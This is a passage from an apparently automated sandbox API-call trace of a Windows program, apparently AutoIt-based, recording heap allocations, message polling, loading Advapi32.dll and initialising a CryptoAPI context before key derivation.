dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0204.422] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0204.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0204.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0204.423] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0204.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0204.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0204.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0204.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0204.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0204.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.424] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0204.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0204.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0204.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0204.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0204.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0204.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0204.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0204.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0204.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0204.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0204.426] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.426] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0204.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.427] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0204.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0204.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0204.427] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0204.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0204.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0204.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0204.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0204.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0204.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0204.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0204.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0204.428] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0204.429] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0204.429] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0204.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0204.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0204.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0204.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0204.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0204.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0204.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0204.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e698c8 [0204.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0204.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0204.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0204.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0204.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0204.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0204.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.431] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0204.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0204.434] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0204.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0204.435] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0204.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0204.435] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0204.435] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0204.435] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.435] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.435] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.435] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0204.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0204.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0204.435] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.436] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0204.436] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0204.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0204.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0204.436] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0204.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0204.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0204.436] RtlAllocateHeap (HeapHandle=0x970000, 